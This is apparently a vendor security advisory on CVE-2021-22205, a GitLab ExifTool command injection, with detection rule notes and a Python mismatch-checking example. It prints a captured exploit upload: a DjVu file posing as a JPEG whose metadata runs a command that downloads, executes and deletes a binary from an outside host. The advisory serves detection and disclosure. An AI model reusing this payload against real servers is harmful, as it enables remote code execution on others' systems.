GitLab Unauthenticated Remote ExifTool Command Injection



Application Details

GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.


Vulnerability

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in remote command execution.


Identification

Files uploaded with the extensions jpg, jpeg or tiff are passed to ExifTool to remove any unauthorised tags. The issue is that ExifTool ignores the file extension and instead determines the file type from the content, so the extension check does not constrain which parser actually handles the upload.



Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
	(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )

Detection

By turning this vulnerability into a traffic file and a matching rule, we are able to detect attempts to upload files whose content does not match the declared content type.
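As an added illustration of the content-type mismatch check described above (example code written for this page, not Idappcom's signature or Traffic IQ logic): it parses one multipart upload part, derives the expected type from the filename extension, and sniffs the body's leading bytes the way ExifTool would. The magic-byte table and the sample parts are constructed for this example.

```python
import re

# Magic-byte prefixes for the types GitLab hands to ExifTool, plus DjVu,
# which ExifTool also recognises by content regardless of extension.
MAGIC = {
    "jpeg": [b"\xff\xd8\xff"],
    "tiff": [b"II*\x00", b"MM\x00*"],
    "djvu": [b"AT&TFORM"],
}
EXTENSION_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "tiff": "tiff", "tif": "tiff"}


def sniff_type(data: bytes) -> str:
    """Classify a file body by its leading bytes, ignoring any declared name."""
    for kind, prefixes in MAGIC.items():
        if any(data.startswith(p) for p in prefixes):
            return kind
    return "unknown"


def check_upload_part(part: bytes) -> dict:
    """Split one multipart part into headers and body, and report whether the
    body's real type matches the type implied by the filename extension."""
    headers, _, body = part.partition(b"\r\n\r\n")
    m = re.search(rb'filename="([^"]*)"', headers)
    filename = m.group(1).decode("latin-1") if m else ""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    declared = EXTENSION_TYPE.get(ext, "unknown")
    actual = sniff_type(body)
    return {"filename": filename, "declared": declared, "actual": actual,
            "mismatch": declared != actual}


# Constructed sample parts (not traffic from the original page): a genuine
# JPEG header, and a DjVu container header uploaded under a .jpg name.
GOOD_PART = (b'Content-Disposition: form-data; name="file"; filename="photo.jpg"\r\n'
             b'Content-Type: image/jpeg\r\n\r\n' + b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")
SUSPECT_PART = (b'Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n'
                b'Content-Type: image/jpeg\r\n\r\n' + b"AT&TFORM\x00\x00\x00\x10DJVM")

if __name__ == "__main__":
    for part in (GOOD_PART, SUSPECT_PART):
        print(check_upload_part(part))
```

A network signature can apply the same test to the multipart body on the wire; the extension and Content-Type header are attacker-controlled, so only the leading bytes of the body are worth trusting.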


Coverage

Idappcom has created signature 8021990 along with a traffic file.


References

CVE-2021-22205

Hacker One Report


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can share your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional